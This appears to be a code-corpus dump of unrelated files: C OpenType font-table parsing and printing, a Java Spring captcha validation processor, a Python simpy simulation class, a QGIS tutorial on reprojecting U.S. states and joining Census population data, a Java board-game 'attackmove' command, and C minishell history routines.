for(; num1 > 0; num1--)
{
plat = font_read16(p);
enc = font_read16(p);
offset = font_read32(p);
if((plat == 0 && enc == 3) || (plat == 3 && enc == 1))
{
font_seek_from_table(p, offset);
break;
}
}
if(num1 == 0) return 0;
//format
if(font_read16(p) != 4) return 0;
font_seek_cur(p, 4);
segcnt = font_read16(p) / 2;
font_seek_cur(p, 6);
//endCode
for(i = 0; i < segcnt; i++)
{
end = font_read16(p);
if(end == 0xffff) return 0;
if(code <= end) break;
}
if(i == segcnt) return 0;
seek_segcnt = (segcnt - 1) * 2;
//startCode
font_seek_cur(p, seek_segcnt + 2);
st = font_read16(p);
if(code < st) return 0;
//idDelta
font_seek_cur(p, seek_segcnt);
delta = (int16_t)font_read16(p);
//idRangeOffset
font_seek_cur(p, seek_segcnt);
range = font_read16(p);
//
if(range == 0)
//delta
return (code + delta) & 0xffff;
else
{
font_seek_cur(p, -2 + range + (code - st) * 2);
return font_read16(p);
}
}
//=============================
// テキストに出力
//=============================
/* Coverage テーブルをリスト化して出力
* (対象となるグリフのリスト) */
void font_output_coverage_list(Font *p)
{
FILE *fp = p->fp_output;
uint16_t format,num,first,end;
format = font_read16(p);
num = font_read16(p);
fprintf(fp, "<format:%d, count:%d>\n", format, num);
if(format == 1)
{
for(; num > 0; num--)
{
font_output_gid_to_uni(p, font_read16(p));
fputc('\n', fp);
}
}
else if(format == 2)
{
for(; num > 0; num--)
{
first = font_read16(p);
end = font_read16(p);
fprintf(fp, "<startCoverageIndex: %d>\n", font_read16(p));
for(; first <= end; first++)
{
font_output_gid_to_uni(p, first);
fputc('\n', fp);
}
}
}
}
/* タグを文字列としてテキスト出力 */
void font_output_tag(Font *p,uint32_t t)
{
fprintf(p->fp_output, "'%c%c%c%c'",
t >> 24, (t >> 16) & 255, (t >> 8) & 255, t & 255);
}
/* UTF-16BE の文字列を読み込んで、テキストに出力 */
void font_output_utf16be_str(Font *p,int len)
{
uint32_t c,c2;
for(; len > 0; len -= 2)
{
//UTF-16BE -> UTF-32
c = font_read16(p);
if(c >= 0x10000)
{
c2 = font_read16(p);
c = (((c & 0x03ff) << 16) | (c2 & 0x03ff)) + 0x10000;
}
//UTF-8
put_uni_to_utf8(p->fp_output, c);
}
fputc('\n', p->fp_output);
}
/* テーブルを使って、GID -> Unicode し、テキスト出力 */
void font_output_gid_to_uni(Font *p,uint16_t gid)
{
FILE *fp = p->fp_output;
uint32_t c;
c = p->gind_table[gid];
fprintf(fp, "[%d] ", gid);
if(c == 0)
//対応する Unicode がない
fputs("(none)", fp);
else
{
fputc('(', fp);
put_uni_to_utf8(fp, c);
fprintf(fp, ") U+%04X", c);
}
}
/* GID -> Unicode し、テキスト出力 (GID は出力しない) */
void font_output_gid_to_uni_char(Font *p,uint16_t gid)
{
FILE *fp = p->fp_output;
uint32_t c;
c = p->gind_table[gid];
if(c == 0)
fprintf(fp, "(none)");
else
{
put_uni_to_utf8(fp, c);
fprintf(fp, " (U+%04X)", c);
}
}
/* GID の置き換えを、テキスト出力 */
void font_output_gid_rep(Font *p,uint16_t gid_src,uint16_t gid_dst)
{
font_output_gid_to_uni(p, gid_src);
fputs(" => ", p->fp_output);
font_output_gid_to_uni(p, gid_dst);
fputs("\n", p->fp_output);
}
/* ClassDef テーブルのデータを出力 */
void font_output_classDef(Font *p)
{
FILE *fp = p->fp_output;
uint16_t format,gid,end,cnt,class;
int i;
format = font_read16(p);
if(format == 1)
{
//gid 〜 gid + cnt - 1 の範囲
gid = font_read16(p);
cnt = font_read16(p);
for(; cnt > 0; cnt--)
{
class = font_read16(p);
font_output_gid_to_uni(p, gid++);
fprintf(fp, " <class %d>\n", class);
}
}
else if(format == 2)
{
//指定グリフ ID 範囲
cnt = font_read16(p);
for(; cnt > 0; cnt--)
{
gid = font_read16(p);
end = font_read16(p);
class = font_read16(p);
for(i = gid; i <= end; i++)
{
font_output_gid_to_uni(p, i);
fprintf(fp, " <class %d>\n", class);
}
}
}
}
/* ValueRecord の値を出力
*
* flags : ValueRecord の値フラグ
* last_enter : 最後に改行を出力 */
void font_output_ValueRecord(Font *p,uint16_t flags,int last_enter)
{
FILE *fp = p->fp_output;
if(flags == 0) return;
fprintf(fp, "[");
if(flags & 1)
font_fprintf(p, fp, "xPlacement:$h, ");
if(flags & 2)
font_fprintf(p, fp, "yPlacement:$h, ");
if(flags & 4)
font_fprintf(p, fp, "xAdvance:$h, ");
if(flags & 8)
font_fprintf(p, fp, "yAdvance:$h, ");
if(flags & 16)
font_fprintf(p, fp, "xPlaDeviceOffset:$H, ");
if(flags & 32)
font_fprintf(p, fp, "yPlaDeviceOffset:$H, ");
if(flags & 64)
font_fprintf(p, fp, "xAdvDeviceOffset:$H, ");
if(flags & 128)
font_fprintf(p, fp, "xAdvDeviceOffset:$H, ");
if(last_enter)
fputs("]\n", fp);
else
fputc(']', fp);
}
//=============================
//
//=============================
/* 現在位置からシーク */
void font_seek_cur(Font *p,int n)
{
fseek(p->fp, n, SEEK_CUR);
}
/* ファイル先頭から指定位置へシーク */
void font_seek(Font *p,uint32_t pos)
{
fseek(p->fp, pos, SEEK_SET);
}
/* 現在のテーブル位置からのオフセット位置へシーク */
void font_seek_from_table(Font *p,uint32_t pos)
{
fseek(p->fp, p->cur_table_offset + pos, SEEK_SET);
}
/* 現在のファイル位置を記録 */
void font_save_pos(Font *p)
{
if(p->filepos_cur < FONT_FILEPOS_NUM)
{
fgetpos(p->fp, p->filepos + p->filepos_cur);
p->filepos_cur++;
}
}
/* 記録した一つ前のファイル位置に戻る */
void font_load_pos(Font *p)
{
if(p->filepos_cur > 0)
{
p->filepos_cur--;
fsetpos(p->fp, p->filepos + p->filepos_cur);
}
}
/* 1byte 読み込み */
uint8_t font_read8(Font *p)
{
uint8_t b;
fread(&b, 1, 1, p->fp);
return b;
}
/* 2byte 読み込み */
uint16_t font_read16(Font *p)
{
uint8_t b[2];
fread(b, 1, 2, p->fp);
return (b[0] << 8) | b[1];
}
/* 4byte 読み込み */
uint32_t font_read32(Font *p)
{
uint8_t b[4];
fread(b, 1, 4, p->fp);
return ((uint32_t)b[0] << 24) | (b[1] << 16) | (b[2] << 8) | b[3];
}
/* 8byte 読み込み */
int64_t font_read64(Font *p)
{
int64_t ret = 0;
uint8_t b[8];
int i;
fread(b, 1, 8, p->fp);
for(i = 0; i < 8; i++)
ret |= (int64_t)b[i] << ((7 - i) << 3);
return ret;
}
//========================
/* fprintf 実体 */
#define _FORM_F_SET 1
#define _FORM_F_X 2
#define _FORM_F_BITS 4
static void _font_fprintf(Font *p,FILE *fp,const char *format,va_list ap)
{
char c;
uint8_t flags;
uint16_t u16,*pu16;
int16_t i16,*pi16;
uint32_t u32,*pu32;
while(1)
{
c = *(format++);
if(c == 0) break;
if(c != '$')
fputc(c, fp);
else
{
c = *(format++);
if(c == 0) break;
//オプション
flags = 0;
while(1)
{
if(c == 'x')
flags |= _FORM_F_X;
else if(c == '+')
flags |= _FORM_F_SET;
else if(c == 'b')
flags |= _FORM_F_BITS;
else
break;
c = *(format++);
if(c == 0) return;
}
//
switch(c)
{
//uint16
case 'H':
u16 = font_read16(p);
if(flags & _FORM_F_BITS)
put_bits(u16, 16);
else if(flags & _FORM_F_X)
fprintf(fp, "0x%04X", u16);
else
fprintf(fp, "%d", u16);
if(flags & _FORM_F_SET)
{
pu16 = va_arg(ap, uint16_t *);
*pu16 = u16;
}
break;
//int16
case 'h':
i16 = (int16_t)font_read16(p);
fprintf(fp, "%d", i16);
if(flags & _FORM_F_SET)
{
pi16 = va_arg(ap, int16_t *);
*pi16 = i16;
}
break;
//uint32
case 'I':
u32 = font_read32(p);
if(flags & _FORM_F_X)
fprintf(fp, "0x%08X", u32);
else
fprintf(fp, "%u", u32);
if(flags & _FORM_F_SET)
{
pu32 = va_arg(ap, uint32_t *);
*pu32 = u32;
}
break;
//tag
case 't':
u32 = font_read32(p);
font_put_tag_str(u32);
if(flags & _FORM_F_SET)
{
pu32 = va_arg(ap, uint32_t *);
*pu32 = u32;
}
break;
}
}
}
}
/* printf */
void font_printf(Font *p,const char *format,...)
{
va_list ap;
va_start(ap, format);
_font_fprintf(p, stdout, format, ap);
va_end(ap);
}
/* fprintf
*
* $[options][type]
*
* <type>
* h : int16
* H : uint16
* I : uint32
* t : tag
*
* <option>
* + : 引数のポインタに読み込んだ値を代入
* x : 16進数で表示
* b : 2進数で表示 */
void font_fprintf(Font *p,FILE *fp,const char *format,...)
{
va_list ap;
va_start(ap, format);
_font_fprintf(p, fp, format, ap);
va_end(ap);
}
//========================
/* メモリから 2byte 読み込み */
uint16_t readbuf16(uint8_t *buf)
{
return (buf[0] << 8) | buf[1];
}
/* メモリから 4byte 読み込み */
uint32_t readbuf32(uint8_t *buf)
{
return ((uint32_t)buf[0] << 24) | (buf[1] << 16) | (buf[2] << 8) | buf[3];
}
/* [GPOS] ValueRecord のフラグから、ValueRecord のサイズ取得 */
int get_ValueRecord_size(uint16_t flags)
{
int size = 0;
//ビットが ON の数だけ +2
for(; flags; flags >>= 1)
{
if(flags & 1)
size += 2;
}
return size;
}
/* Tag の値を表示 (数値付き) */
void font_put_tag(uint32_t t)
{
if(t)
{
printf("'%c%c%c%c' (0x%08X)",
t >> 24, (t >> 16) & 255, (t >> 8) & 255, t & 255,
t);
}
}
/* Tag の値を表示 (文字列のみ) */
void font_put_tag_str(uint32_t t)
{
if(t)
{
printf("'%c%c%c%c'",
t >> 24, (t >> 16) & 255, (t >> 8) & 255, t & 255);
}
}
/* ビット値を文字列出力 */
void put_bits(uint32_t val,int cnt)
{
uint32_t f;
int pos;
pos = cnt - 1;
f = 1 << pos;
for(; f > 0; f >>= 1, pos--)
{
putchar((val & f)? '1': '0');
if((pos & 3) == 0 && pos != 0)
putchar('_');
}
printf("b");
}
/* Unicode 1文字 -> UTF8 出力 */
void put_uni_to_utf8(FILE *fp,uint32_t c)
{
uint8_t b[4];
int len = 0;
if(c < 0x80)
{
b[0] = (uint8_t)c;
len = 1;
}
else if(c <= 0x7ff)
{
b[0] = 0xc0 | (c >> 6);
b[1] = 0x80 | (c & 0x3f);
len = 2;
}
else if(c <= 0xffff)
{
b[0] = 0xe0 | (c >> 12);
b[1] = 0x80 | ((c >> 6) & 0x3f);
b[2] = 0x80 | (c & 0x3f);
len = 3;
}
else if(c <= 0x1fffff)
{
b[0] = 0xf0 | (c >> 18);
b[1] = 0x80 | ((c >> 12) & 0x3f);
b[2] = 0x80 | ((c >> 6) & 0x3f);
b[3] = 0x80 | (c & 0x3f);
len = 4;
}
if(len)
fwrite(b, 1, len, fp);
}
|
Java
|
UTF-8
| 3,771 | 2.4375 | 2 |
[] |
no_license
|
package indi.qiaolin.security.core.validate.code.impl;
import indi.qiaolin.security.core.validate.code.*;
import org.apache.commons.lang.StringUtils;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.web.bind.ServletRequestBindingException;
import org.springframework.web.bind.ServletRequestUtils;
import org.springframework.web.context.request.ServletWebRequest;
import java.util.Map;
/**
*
* @author qiaolin
* @version 2018/11/28
**/
public abstract class AbstractValidateCodeProcessor<T extends ValidateCode> implements ValidateCodeProcessor{
private static final String GENERATOR_SUFFIX = "CodeGenerator";
	/** Spring collects all ValidateCodeGenerator beans into this map, keyed by bean name, with the bean itself as the value */
@Autowired
private Map<String, ValidateCodeGenerator> validateCodeGeneratorMap;
@Autowired
private ValidateCodeRepository validateCodeRepository;
@Override
public void create(ServletWebRequest request) throws Exception {
T validateCode = generate(request);
save(request, validateCode);
send(request, validateCode);
}
	/**
	 * Generate the validation code.
	 * @param request
	 * @return the generated validation code object
	 */
protected T generate(ServletWebRequest request) {
String type = getValidateType().toString().toLowerCase();
ValidateCodeGenerator validateCodeGenerator = validateCodeGeneratorMap.get(type + GENERATOR_SUFFIX);
return (T) validateCodeGenerator.generate(request);
}
	/**
	 * Save the validation code, for example into the session or Redis.
	 * @param request
	 * @param validateCode the generated validation code
	 */
protected void save(ServletWebRequest request, T validateCode) {
ValidateCode code = new ValidateCode(validateCode.getCode(), validateCode.getExpireTime());
validateCodeRepository.save(request, code, getValidateType());
}
	/**
	 * Send the validation code,
	 * for example:
	 * an image captcha is written out to the front end
	 * an SMS code is sent to the user
	 * @param request
	 * @param validateCode the generated validation code
	 * @throws Exception
	 */
protected abstract void send(ServletWebRequest request, T validateCode) throws Exception;
@Override
public void validate(ServletWebRequest request) {
String codeInRequest = null;
try {
codeInRequest = ServletRequestUtils.getStringParameter(request.getRequest(), getValidateType().getParameterOnValidate());
} catch (ServletRequestBindingException e) {
throw new ValidateCodeException("获取验证码的值失败!");
}
ValidateCodeType validateType = getValidateType();
if(StringUtils.isBlank(codeInRequest)){
throw new ValidateCodeException("验证码不能为空!");
}
T codeInSession = (T) validateCodeRepository.get(request, validateType);
if(codeInSession == null){
throw new ValidateCodeException("验证码不存在!");
}
if(codeInSession.isExpire()){
validateCodeRepository.remove(request, validateType);
throw new ValidateCodeException("验证码已过期!");
}
if(!StringUtils.equals(codeInRequest, codeInSession.getCode())){
throw new ValidateCodeException("验证码不匹配!");
}
validateCodeRepository.remove(request, validateType);
}
	/**
	 * Determine the validation code type from the prefix of the current processor class name.
	 * @return
	 */
private ValidateCodeType getValidateType(){
String type = StringUtils.substringBefore(getClass().getSimpleName(), "CodeProcessor");
return ValidateCodeType.valueOf(type.toUpperCase());
}
}
|
Java
|
UTF-8
| 1,086 | 2.515625 | 3 |
[] |
no_license
|
package Praktikum_PBO_5;
/*
* To change this license header, choose License Headers in Project Properties.
* To change this template file, choose Tools | Templates
* and open the template in the editor.
*/
/**
*
* @author LEGION
*/
public class Buku {
private String judul;
private int tahunpenerbitan;
private Penulis penulis;
    public Buku() {
        this.penulis = new Penulis();
    }
public Buku(String judul, int tahunpenerbitan, Penulis penulis) {
this.judul = judul;
this.tahunpenerbitan = tahunpenerbitan;
this.penulis = penulis;
}
public String getJudul() {
return judul;
}
public void setJudul(String judul) {
this.judul = judul;
}
public int getTahunpenerbitan() {
return tahunpenerbitan;
}
public void setTahunpenerbitan(int tahunpenerbitan) {
this.tahunpenerbitan = tahunpenerbitan;
}
public String getNamaPenulis() {
return penulis.getNama();
}
}
|
Python
|
UTF-8
| 998 | 2.90625 | 3 |
[
"BSD-3-Clause"
] |
permissive
|
import simpy
import logging
from .structure_item import StructureItem
from .num_spec import NumSpec, Choice
class Select(StructureItem):
"""
Select is a call StructureItem that randomly (or per Branch selection probability)
executes one of the contained CallStructure items.
"""
def __init__(self, env: simpy.Environment, logger: logging.Logger,
construct_id: str, systemModel: dict, structureItem: dict):
super(Select, self).__init__(env, logger,
construct_id, systemModel, structureItem)
self.structureType = "Select"
def simulate(self):
"""
Setup the Simpy simulation for a Select structure
"""
self.log_start()
# determine random choice of contained items
choice = NumSpec(Choice(len(self.structureItems))).getValue()
# execute random choice
yield self.env.process(self.structureItems[choice].simulate())
self.log_end()
|
Markdown
|
UTF-8
| 20,057 | 2.875 | 3 |
[] |
no_license
|
## Tutorial 04 - Working with Projections
Projections enable us to represent the earth on a flat surface. The WGS84 Geographic Coordinate System is the default projection in QGIS.
### Datasets
This tutorial will incorporate two datasets, one provided by Natural Earth and one provided by the U.S. Census. First, download the current administrative boundaries of the U.S., listed below:
* ne_10m_admin_1_states_provinces (Admin 1 – States, Provinces) - Internal administrative boundaries. Originally downloaded [here](http://www.naturalearthdata.com/downloads/10m-cultural-vectors/).
And before we start, a brief overview of some terminology.
### Datum, Projection, CRS
#### Datum
A datum defines the spheroidal surface to which a given set of coordinates is referenced, as well as the position of that surface in relation to the center of the earth. Examples include NAD83 (which we encountered in previous tutorials that used the NAD_1983_StatePlane_New_York_Long_Island_FIPS_3104_Feet projection), WGS84, and NAD27. For more concrete evidence of this, open up the QGIS `Project` menu, select `Project Properties`, and navigate to the `CRS` section. If you search for `NAD83`, QGIS will generate a long list of different projections referenced to the NAD83 datum.

Two datasets that were originally referenced to different datums, but which are then rendered in the same projection, will not line up.
#### Projection
A projection, or Coordinate Reference System (CRS), is used to describe geographic data. A projection is the set of transformations that converts a series of geographic coordinates, which are locations on a curved surface (the datum), into locations on a flat surface.
#### A note re: QGIS 'on the fly' CRS Transformation
The behavior for this option can be unpredictable, and QGIS has the annoying habit of resetting this option after certain types of data manipulation. The layer you currently have selected when you check or un-check this option impacts its effect.
* Typically, when you **un-check** `Enable 'on the fly' CRS Transformation` with the intention of undoing any unexpected transformations, you must have the _transformed_ layer highlighted in the left layer panel to undo its automatic re-projection. If this doesn't work, select the layer _to which_ the transformed layer was transformed, and check/un-check the option again.
* Likewise, if you **check** `Enable 'on the fly' CRS Transformation`, you must typically have the layer with the projection you want to _match_ highlighted in the left panel.
* For this tutorial, you can avoid having to constantly check and un-check this option by closing the project that contains the original Natural Earth dataset and reopening a new project with the re-projected U.S. states as the first layer. This way, the project projection will be set by default to the Albers projection.
### Creating a thematic population map of the U.S.
#### Downloading Census state population data
The Natural Earth state boundaries will serve as the 'empty' geography files for this project. As in Tutorial 03, we need to decide on the units of measurement we plan to use before opening a new QGIS project. For this tutorial, we will be mapping the population count for each U.S. state.
_**Note:** Due to the constraints of the Natural Earth data, this tutorial will only walk through the process of representing raw population count for each state, as opposed to population density. **Representing raw counts in this manner is considered bad practice. Choropleth maps should always represent values that lie on a continuous statistical surface, in the form of rates or ratios. [Here](https://en.wikipedia.org/wiki/Choropleth_map#/media/File:Choropleth-density.png) is a helpful visual that demonstrates the difference.** If you would like to visualize population density, download state area boundaries from the [TIGER](https://www.census.gov/cgi-bin/geo/shapefiles/index.php) database, which contain official state area measurements. Create a new column in the attribute table to concatenate a FIPS value for each state using the `STATEFP` column, and join the layer to the `US_States_Albers` layer we create below. Access the `ALAND` column for true state area values, which you can use to calculate population per square kilometer._
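_In the QGIS field calculator, that calculation works out to an expression along the lines of `"Population" / ("ALAND" / 1000000.0)` for population per square kilometer, since TIGER reports `ALAND` in square meters; treat the exact field names as placeholders for whatever your join produces._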
To download the data for this project, we will be returning again to the [American Fact Finder](http://factfinder.census.gov/faces/nav/jsf/pages/index.xhtml) data portal. Navigate to the portal and click the `Advanced Search` option. Here we will select the following parameters within the `Topics` and `Geographies` levels:
* Geography: All States within United States and Puerto Rico
* Dataset: 2015 Population Estimates
* Topic: Population Total
On the left side of the `Advanced Search` window, and open up the `Topics` tab. Click the `Dataset` section, and select `2015 Population Estimates`.

Next, open up the `Geographies` tab, and select `State - 040` from the dropdown menu. Select `All States within United States and Puerto Rico` from the window that pops up below, then click `ADD TO YOUR SELECTIONS`.

Finally, open up the `Topics` tab again. Click on the `People` section, open `Basic Count/Estimate`, and select `Population Total`. One dataset should remain in the search results window, entitled `Annual Estimates of the Resident Population: April 1, 2010 to July 1, 2015.`

Click the link to navigate to the table. This view should include a column listing the full name of every U.S. state, as well as subsequent columns containing population estimates for 2010, 2011, 2012, 2013, 2014, and 2015. To download the data in CSV format, click the `Download` button in the `Actions` bar.

Click `OK` when prompted to download the data, and then click the `Download` button once the popup window says the file is complete. The downloaded file will be named `PEP_2015_PEPANNRES`.
#### Transforming Census state population data
As always, there are many possible ways to transform data to fit the needs of your project. For this tutorial we will be working in Excel. We will reduce the dataset down to only the values we need, and then create a new column that will enable us to join the data to the Natural Earth shapefile.
* Unzip the `PEP_2015_PEPANNRES` file, and open up the CSV called `PEP_2015_PEPANNRES_with_ann.csv`. The file should look something like this:

* In order to create our map, the only data we need is state name, state ID, and population count.
* To narrow the dataset down to only these values, delete every column *except* for `GEO.id`, `GEO.display-label`, and the last column on the right, `respop72015`.
* Next, delete the second row of the spreadsheet, which contains descriptions for the columns.

* Rename the columns to `ID`, `Name`, and `Population`.
* We will be using [FIPS region codes](https://en.wikipedia.org/wiki/List_of_FIPS_region_codes_(S%E2%80%93U)#US:_United_States) to join the Natural Earth vector boundaries with the Census population data. The value in the `ID` column is a concatenated string that combines the Census table ID with individual state FIPS codes. We need to separate out the FIPS code portion of this ID so that this dataset can match up with the Natural Earth dataset, which already uses FIPS codes to identify each state. To do that, we need to create a new column that pulls *only the last four characters* in the `ID` column. We will use the `Right` function in Excel to do this.
* Create a new column in Excel, and name it `FIPS_ID`.
* In the first cell of the column, type the formula `=RIGHT(A2,4)`. This will pull the last four characters of the `ID` value in cell `A2` into the new `FIPS_ID` column.

* After typing the formula, hit `Enter`. Double-click on the bottom right corner of the cell to populate the entire column with the new formula.

* Name the file `StatePopulations.csv`, and save it in the `Windows Comma Separated` format.

* As in Tutorial 03, we need to create a file that describes the data types in this new CSV before attempting to import it into QGIS. We will therefore use a text editor to create a `.csvt` file.
* In your text editor of choice, open a new file.
* In our CSV file, every column except for `Population` is a string. We therefore want to type, in order, `"String", "String", "Integer", "String"`.
* Save the file with the same name as the CSV file, only with the `.csvt` extension: `StatePopulations.csvt`. It should look something like this:

* Now we are ready to bring all of the data together in QGIS.
#### Re-projecting selected features from the Natural Earth dataset
We will begin by importing the Natural Earth boundary data into a new QGIS project. Because we are creating a thematic map of the United States, we only need the portions of the Natural Earth shapefile that represent U.S. administrative boundaries. We will isolate these areas, then re-project them to a projection more suitable for a U.S.-specific thematic map.
* Open up a new project in QGIS and add the Natural Earth states and provinces data. The data is referenced to the WGS84 datum, which we can see by navigating to the `Metadata` section under `Layer Properties`. The definition for the layer's projection is under `Layer Spatial Reference System`.

* Since we are creating a map of the United States, the next step is to select all states and provinces that fall within U.S. administrative boundaries. Open up the attribute table for the states and provinces layer, click the `Select features using an expression` option, and build a query to select all features for which the `admin` value is equal to `United States of America`.

* Hit `Select` and close the query builder. Navigating back to the map, only the U.S. should be selected.

* Now, we want to re-project the United States to the Albers equal-area conic projection. The Albers projection is a popular choice for thematic maps of the U.S. Right-click the states and provinces layer, choose `Save As...`, choose `ESRI Shapefile`, and select `North_America_Albers_Equal_Area_Conic (EPSG:102008)` as the CRS. You may have to search for the specific projection by clicking on the small square icon next to the `CRS` dropdown menu.

* Name the file `US_States_Albers`. Make sure to check the `Save only selected features` option, and hit `OK`.
* When added to your current project, the new layer will automatically be displayed in the project's default WGS84 projection. Opening up the properties of `US_States_Albers` and navigating again to the `Metadata` panel, we can see that the `Layer Spatial Reference System` is _not_ WGS84, but the Albers projection we selected in the previous step. The layer itself is stored in Albers; QGIS is simply re-projecting it on the fly to match the projection of the base layer.

* To prevent QGIS from automatically re-projecting the new layer to the current project CRS, select the `Project` dropdown in the top menu, select `Project Properties`, and _un-check_ `Enable 'on-the-fly' CRS transformation`. Now, select the `US_States_Albers` layer, right-click, and select `Zoom to Layer`. The features that fall within the administrative boundaries of the U.S. will have been re-projected to the Albers projection.

* Go ahead and hide the full Natural Earth base layer in the left panel.
#### Preparing the U.S. Albers layer to be joined to the Census layer
Earlier, we transformed the Census population data in Excel to prepare it to be joined to the Natural Earth vector boundaries. Now, we are almost ready to import the state population CSV into QGIS, and join it to the re-projected `US_States_Albers` layer using the FIPS ID for each state. Before we join the data, however, we have to make one more quick adjustment to the `US_States_Albers` layer, which contains an ambiguous FIPS reference for Minnesota.

In order for this shapefile to correspond to our CSV file, the FIPS code for Minnesota needs to be `US27`, the value in Minnesota's `fips_alt` column. We are going to edit this manually.
_**Note:** this is only required for Minnesota, despite the fact that other states also have a `fips_alt` value._
* Open up the attribute table for the `US_States_Albers` layer.
* Select the row that corresponds to Minnesota. Its value in the first `adm1_code` column is `USA-3514`.
* Click the abacus icon to open up the field calculator window. Make sure that `Only update 1 selected features` is checked.
* Check `Update existing field`.
* Select `fips` as the field to update.
* Open up the `Fields and Values` row in the middle panel, and select the `fips_alt` field.
* Double-click the field to add it to the field calculation panel.

* Click `OK`. The `fips` value for Minnesota should now be `US27`, the same as its `fips_alt` value.
_**Note:** This change may cause your project to re-project the `US_States_Albers` layer back to WGS84. To undo this, select the `ne_10m_admin_1_states_provinces` layer in the left panel, navigate to the top `Project` menu, go to `Project Properties...`, and check then un-check `Enable 'on the fly' CRS transformation`. Right-click the U.S. Albers layer and select `Zoom to Layer` in order to return to your previous view._
#### Joining Census data to Natural Earth boundaries
Now that the `US_States_Albers` layer is ready, we can import the CSV file and join population values to each state.
* Click the top `Layer` menu, navigate to `Add Layer`, and select `Add Delimited Text Layer...`.
* Select the previously-saved `StatePopulations.csv` file.
* Click the `No geometry (attribute only table)` option.
* Ensure the data looks correctly formatted, and click `OK`.

* Now, double-click on the `US_States_Albers` layer to bring up the `Layer Properties` panel.
* Navigate to the `Joins` section.
* Click the `+` button at the bottom of the window to add a new join.
* Select `StatePopulations`, your imported CSV file, as the join layer.
* Select `FIPS_ID` as the `Join field`, which is the column name for the FIPS ID in the CSV file.
* Select `fips` as the `Target field`, which is the column name for the FIPS ID in the `US_States_Albers` layer.
* If you like, create a short `Custom field name prefix` to differentiate your joined columns from the original ones.

* Click `OK`.
* Exit the `Layer Properties` panel, and open up the attribute table for the `US_States_Albers` layer. Confirm that three additional fields were added to the end.
* We now need to save the `US_States_Albers` layer as a new shapefile in order to retain the join. Right-click on the layer, choose `Save as...`, and name it `US_States_Albers_JOINED`. Make sure the selected CRS is still `North_America_Albers_Equal_Area_Conic (EPSG:102008)`, and keep `Add saved file to map` checked. Click `OK`.
#### Representing population data
For our final print export, we will be creating a choropleth-_style_ map that represents raw population counts for each state. Now that the U.S. Albers shapefile has been joined to the Census data, this simply requires navigating to the `US_States_Albers_JOINED` `Layer Properties` panel, and selecting a graduated color scale for the population count column. Your map should look something like this:

Once you are finished with this step, adjust colors and strokes as needed. Finally, create a new print composer. Add a legend, title, explanation, source, and scale bar. Add new layers for Alaska and Hawaii to approach a more 'stereotypical' Albers view, and make sure to include a scale bar for each one so as to be transparent about any distortion. Export your map as a PDF file. Your final map should look something like this:

#### Deliverables
#### Additional notes
[Here](https://medium.com/@joshuatauberer/how-that-map-you-saw-on-538-under-represents-minorities-by-half-and-other-reasons-to-consider-a-4a98f89cbbb1#.ih16rv26m) is an excellent piece on how choropleth maps underrepresent minorities.
|
Java
|
UTF-8
| 1,470 | 2.984375 | 3 |
[] |
no_license
|
package ca.concordia.encs.conquerdia.controller.command;
import ca.concordia.encs.conquerdia.exception.ValidationException;
import ca.concordia.encs.conquerdia.model.PhaseModel;
import ca.concordia.encs.conquerdia.model.player.Player;
import java.util.List;
/**
* AttackMove Command handler
*
*/
public class AttackMoveCommand extends AbstractCommand {
/**
* Helper message
*/
public static final String COMMAND_HELP_MSG = "A valid \"attackmove\" command format is \"attackmove num\".";
/**
* {@inheritDoc}
*/
@Override
protected void runCommand(List<String> inputCommandParts) throws ValidationException {
if (inputCommandParts.size() == getCommandType().getMinNumberOfParts()) {
try {
int numOfArmiesToMove = Integer.parseInt(inputCommandParts.get(1));
if (numOfArmiesToMove < 0) {
throw new NumberFormatException();
}
Player player = PhaseModel.getInstance().getCurrentPlayer();
phaseLogList.add(player.attackMove(numOfArmiesToMove));
} catch (NumberFormatException ex) {
throw new ValidationException("Number of armies to be moved must be a positive integer number.");
}
} else {
throw new ValidationException("Invalid input! " + getCommandHelpMessage());
}
}
/**
* {@inheritDoc}
*/
@Override
protected String getCommandHelpMessage() {
return COMMAND_HELP_MSG;
}
/**
* {@inheritDoc}
*/
@Override
protected CommandType getCommandType() {
return CommandType.ATTACK_MOVE;
}
}
|
C
|
UTF-8
| 3,419 | 2.59375 | 3 |
[] |
no_license
|
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* history.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: yforeau <yforeau@student.42.fr> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2019/04/21 14:47:30 by yforeau #+# #+# */
/* Updated: 2019/12/11 21:08:04 by yforeau ### ########.fr */
/* */
/* ************************************************************************** */
#include <fcntl.h>
#include "sh_data.h"
void load_history(t_sh_history *hist, char *path)
{
int fd;
ssize_t cmd_len;
fd = -1;
hist->size = 0;
if ((path = path ? ft_strjoin(path, "/.minihistory") : NULL)
&& (fd = open(path, O_RDONLY | O_NOFOLLOW)) != -1)
{
while (read(fd, &cmd_len, sizeof(ssize_t)) == sizeof(ssize_t)
&& hist->size < (HISTMAX / 2) && cmd_len < CMDMAX)
{
hist->cmd[hist->size] = ft_strnew(cmd_len);
if (read(fd, hist->cmd[hist->size++], cmd_len) != cmd_len)
{
ft_memdel((void **)&hist->cmd[--hist->size]);
break ;
}
}
}
if (fd != -1)
close(fd);
ft_memdel((void **)&path);
}
void add_to_history(char *input, t_sh_history *hist,
char *path, size_t *cmd_c)
{
int fd;
fd = -1;
if (hist->size == HISTMAX)
{
del_history(hist, 0, HISTMAX / 2);
if ((path = path ? ft_strjoin(path, "/.minihistory") : NULL)
&& (fd = open(path, O_TRUNC | O_WRONLY | O_CREAT
| O_NOFOLLOW, 0600)) != -1)
{
write_history(fd, hist, 0, HISTMAX / 2);
close(fd);
*cmd_c = 0;
}
ft_memdel((void **)&path);
}
hist->cmd[hist->size++] = ft_strdup(input);
}
void del_history(t_sh_history *hist, size_t start, size_t len)
{
char *to_del[HISTMAX];
if (!hist || !hist->size || !len || start + len > hist->size)
return ;
ft_memcpy((void *)to_del, (void *)(hist->cmd + start),
len * sizeof(char *));
ft_memcpy((void *)(hist->cmd + start), (void *)(hist->cmd + len),
(hist->size - start - len) * sizeof(char *));
hist->size -= len;
while (len)
ft_memdel((void **)&to_del[--len]);
}
void write_history(int fd, t_sh_history *hist, size_t start, size_t len)
{
size_t i;
ssize_t cmd_len;
if (!hist || !hist->size || !len || start + len > hist->size)
return ;
i = 0;
while (i < len)
{
cmd_len = ft_strlen(hist->cmd[start + i]);
write(fd, &cmd_len, sizeof(ssize_t));
write(fd, hist->cmd[start + i], cmd_len);
++i;
}
}
void flush_history(t_sh_history *hist, size_t len, char *path)
{
int fd;
size_t max;
t_sh_history old;
fd = -1;
old.size = 0;
